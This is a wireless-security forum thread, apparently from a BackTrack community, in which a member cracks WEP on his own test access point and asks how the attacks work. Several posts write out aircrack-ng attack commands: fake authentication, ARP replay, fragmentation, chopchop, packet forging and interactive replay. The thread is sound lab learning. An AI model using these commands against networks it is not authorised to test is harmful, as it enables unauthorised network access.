Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: The theory work

  1. #1
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default The theory work

    Hi guys

    Not been able to keep up for a long time, but decided now was a good time to start re-familiarising myself with BT and tools (and linux ._.)

    I have decided that a nice simple 40bit WEP Crack with no clients would be a nice way to refamiliarise myself with stuff. So I have setup a Cisco Aironet 1100 for this purpose.

    Following Xploitz vid (nicely done btw) and I have everything down except the last part - for reference this is the order I have things running.

    1. Started card in monitor mode (WG511T)
    2. Started Airodump-ng, filtered to only show the right channel and ssid
    3. Used Aireplay-ng to fake auth my laptop (successful)
    4. Ran Aireplay -3 and within seconds I got a healthy number of ARP and hovering around 500pps. Airodump reflects this also.
    5. Restarted Airodump to capture to a file
    6. Started Aircrack to start working on the key (just set at 1234567890)

    So its been running for around 40 mins, and only 8 IV's. Tried re-authing and restarted -3, all the numbers look healthy, but no unique IV's.

    Here's the catch - instead of just saying "Oh you need this command" or "gfto and look it up", I would like the kind members to either explain why, or link me. I have (and still am) looking but was hoping to speed the process up!

    EDIT: Well I just re-read my post and it doesnt really portray what I am after...I am very interested at the packet level theory so if any of you feel the need to indulge me what is going on at each stage, please feel free ^^ (or link,, all I can find are guides like "Do this and do that, hey presto!)

    EDIT2: EDIT2: Tried with a real client and cracked it in 46s...now I know its has to be something to do with fake auth, and not a command I missed etc.

  2. #2
    Senior Member
    Join Date
    Feb 2008
    Posts
    681

    Default

    Quote Originally Posted by hongman View Post

    EDIT: Well I just re-read my post and it doesnt really portray what I am after...I am very interested at the packet level theory so if any of you feel the need to indulge me what is going on at each stage, please feel free ^^ (or link,, all I can find are guides like "Do this and do that, hey presto!)

    EDIT2: EDIT2: Tried with a real client and cracked it in 46s...now I know its has to be something to do with fake auth, and not a command I missed etc.
    lmao, that's a first. I appreciate your honesty.

    As well as the tutorials here, the aircrack tutorials section is an awesome resource.
    http://www.aircrack-ng.org/doku.php?id=tutorial
    [FONT=Courier New][SIZE=2][FONT=Courier New]hehe...
    [/FONT][/SIZE][/FONT]

  3. #3
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default

    Thanks.

    Having too much information is just as frustrating at times as having too little...10 guides showing different ways, some outdated, etc etc....gets a bit daunting :P

    All in good time.

    Thanks again.

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    If you have no clients connected there are 2 other attacks which are designed for that. The -5 (frag) & -4 (chop)

  5. #5
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default

    Thanks, Ill look those up!

  6. #6
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    and the
    -2 -F -c FF:FF:FF:FF:FF:FF -b APMAC -h CLIMAC -p0841

    also works well butis a little longer
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  7. #7
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default

    Hmm, a little confused now I just tried it. I think it will become evident of my lack of understanding of these protocols >.<

    At first I thought I would try the Fragmentation Attack, after reading about it on aircrack-ng.org.

    So (following the guide on aircrack-ng.org):

    1. Fired up airodump-ng, set channel and bssid
    2. Fake Auth
    3.
    Code:
    aireplay-ng -5 -b APMAC ath0
    4. Selected "Yes" on first packet, got my .xor file
    5.
    Code:
    packetforge-ng -0 -a APMAC -h CLIENTMAC -k RANDOMIP -l RANDOMIP2 -y fragment.xor -w arp-request
    6.
    Code:
    airdecap-ng -w 1234567890 arp-request
    7.
    Code:
    tcpdump -n -vvv -e -s0 -r arp-request-dec
    Stop!

    From Step 3 down, I'm not really sure what or why I am doing these things! Which is kind of pointless - if I dont understand an attack, its no good.

    I have read the correspondence on various links, guess I need to read some more. But some key questions I have about the process so far which have come to mind:

    1. Is the Fragmentatin attack and Interactive Packet Relay attack part of the same natural attack process, or are they completely seperate? Just that part 8 of this process is using -2 (this is when I decided to stop to get some understanding)

    2. In part 6, using airdecap-ng - it says to input the wep key to decrypt the packet/fragment - isnt this a bit pointless if the exercise is to retreive the key? Or is this for demonstration purposes (i.e an extra step to show how it works)

    Thanks for bearing with me ^^;

  8. #8

    Default

    If you want a real step-by-step tutorial, check out n00bhacker.blogspot.com Use the Table of Contents on top to get to the part you want

    Quote Originally Posted by hongman View Post
    Hmm, a little confused now I just tried it. I think it will become evident of my lack of understanding of these protocols >.<

    At first I thought I would try the Fragmentation Attack, after reading about it on aircrack-ng.org.

    So (following the guide on aircrack-ng.org):

    1. Fired up airodump-ng, set channel and bssid
    2. Fake Auth
    3.
    Code:
    aireplay-ng -5 -b APMAC ath0
    4. Selected "Yes" on first packet, got my .xor file
    5.
    Code:
    packetforge-ng -0 -a APMAC -h CLIENTMAC -k RANDOMIP -l RANDOMIP2 -y fragment.xor -w arp-request
    6.
    Code:
    airdecap-ng -w 1234567890 arp-request
    7.
    Code:
    tcpdump -n -vvv -e -s0 -r arp-request-dec
    Stop!

    From Step 3 down, I'm not really sure what or why I am doing these things! Which is kind of pointless - if I dont understand an attack, its no good.

    I have read the correspondence on various links, guess I need to read some more. But some key questions I have about the process so far which have come to mind:

    1. Is the Fragmentatin attack and Interactive Packet Relay attack part of the same natural attack process, or are they completely seperate? Just that part 8 of this process is using -2 (this is when I decided to stop to get some understanding)

    2. In part 6, using airdecap-ng - it says to input the wep key to decrypt the packet/fragment - isnt this a bit pointless if the exercise is to retreive the key? Or is this for demonstration purposes (i.e an extra step to show how it works)

    Thanks for bearing with me ^^;

  9. #9
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default

    Reading now, thanks for the linky

  10. #10
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default

    Hmm, read through the relevant sections, unfortunately he doesnt touch on frag attacks

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •